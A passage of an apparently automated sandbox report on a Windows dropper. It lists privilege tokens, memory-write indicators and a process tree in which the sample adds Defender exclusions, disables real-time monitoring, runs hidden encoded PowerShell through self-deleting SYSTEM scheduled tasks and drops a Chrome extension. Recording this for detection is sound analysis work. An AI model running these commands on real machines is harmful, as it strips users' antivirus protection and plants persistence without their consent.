SeSystemEnvironmentPrivilege 2200 WMIC.exe Token: SeUndockPrivilege 2200 WMIC.exe Token: SeManageVolumePrivilege 2200 WMIC.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1228 WMIC.exe Token: SeIncreaseQuotaPrivilege 1228 WMIC.exe Token: SeSecurityPrivilege 1228 WMIC.exe Token: SeTakeOwnershipPrivilege 1228 WMIC.exe Token: SeLoadDriverPrivilege 1228 WMIC.exe Token: SeSystemtimePrivilege 1228 WMIC.exe Token: SeBackupPrivilege 1228 WMIC.exe Token: SeRestorePrivilege 1228 WMIC.exe Token: SeShutdownPrivilege 1228 WMIC.exe Token: SeSystemEnvironmentPrivilege 1228 WMIC.exe Token: SeUndockPrivilege 1228 WMIC.exe Token: SeManageVolumePrivilege 1228 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 3044 wrote to memory of 2924 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 30 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2924 wrote to memory of 2332 2924 Install.exe 31 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2332 wrote to memory of 2108 2332 Install.exe 33 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2108 wrote to memory of 2772 2108 forfiles.exe 35 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2772 wrote to memory of 2824 2772 cmd.exe 36 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2824 wrote to memory of 2912 2824 powershell.exe 37 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 2332 wrote to memory of 2604 2332 Install.exe 38 PID 1656 wrote to memory of 600 1656 taskeng.exe 41 PID 1656 wrote to memory of 600 1656 taskeng.exe 41 PID 1656 wrote to memory of 600 1656 taskeng.exe 41 PID 1656 wrote to memory of 600 1656 taskeng.exe 41 PID 600 wrote to memory of 2896 600 KMGxOJw.exe 42 PID 600 wrote to memory of 2896 600 KMGxOJw.exe 42 PID 600 wrote to memory of 2896 600 KMGxOJw.exe 42 PID 600 wrote to memory of 2896 600 KMGxOJw.exe 42 PID 600 wrote to memory of 2888 600 KMGxOJw.exe 44 PID 600 wrote to memory of 2888 600 KMGxOJw.exe 44 PID 600 wrote to memory of 2888 600 KMGxOJw.exe 44 PID 600 wrote to memory of 2888 600 KMGxOJw.exe 44 PID 2076 wrote to memory of 1492 2076 taskeng.exe 47 PID 2076 wrote to memory of 1492 2076 taskeng.exe 47 PID 2076 wrote to memory of 1492 2076 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe"C:\Users\Admin\AppData\Local\Temp\81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\7zSF9AA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\7zSFB8E.tmp\Install.exe.\Install.exe /sPpdidhbLXM "385132" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkCoNHObbyzyhGakUl" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\RsZlzrtgfOEbfcw\KMGxOJw.exe\" uX /xXXQdidKaz 385132 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 6164⤵
- Loads dropped DLL
- Program crash
PID:1316
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4835BE61-5300-4D8F-B66A-1C1F30005551} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\RsZlzrtgfOEbfcw\KMGxOJw.exeC:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\RsZlzrtgfOEbfcw\KMGxOJw.exe uX /xXXQdidKaz 385132 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFOfYmzpa" /SC once /ST 01:12:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFOfYmzpa"3⤵PID:2888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFOfYmzpa"3⤵PID:580
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1412
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1964
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1584
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfzqDtNyD" /SC once /ST 14:31:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfzqDtNyD"3⤵PID:2948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfzqDtNyD"3⤵PID:848
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:1020
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:323⤵PID:1264
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:643⤵PID:2548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:323⤵PID:2884
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵PID:2932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:643⤵PID:2108
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵PID:2568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\hwSlakOgexbeQMmf\BzjAOICr\hdrPsZwXPuEMNAoO.wsf"3⤵PID:3004
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\hwSlakOgexbeQMmf\BzjAOICr\hdrPsZwXPuEMNAoO.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2600 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:324⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:644⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:324⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:644⤵PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:324⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:644⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:324⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:644⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:324⤵PID:2392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:644⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:324⤵PID:2508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:644⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:324⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:644⤵PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵PID:2452
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbgHrRKCg" /SC once /ST 17:53:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbgHrRKCg"3⤵PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbgHrRKCg"3⤵PID:2548
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2700
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2556
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2612
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYQNStpqGWmiKXVBK" /SC once /ST 09:25:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\hwSlakOgexbeQMmf\kXmfTSTNQctqSzO\fLbUxhl.exe\" Iq /ynWydidiw 385132 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYQNStpqGWmiKXVBK"3⤵PID:444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 600 -s 2523⤵
- Loads dropped DLL
- Program crash
PID:1028
-
-
-
C:\Windows\Temp\hwSlakOgexbeQMmf\kXmfTSTNQctqSzO\fLbUxhl.exeC:\Windows\Temp\hwSlakOgexbeQMmf\kXmfTSTNQctqSzO\fLbUxhl.exe Iq /ynWydidiw 385132 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bkCoNHObbyzyhGakUl"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:648
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:308
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
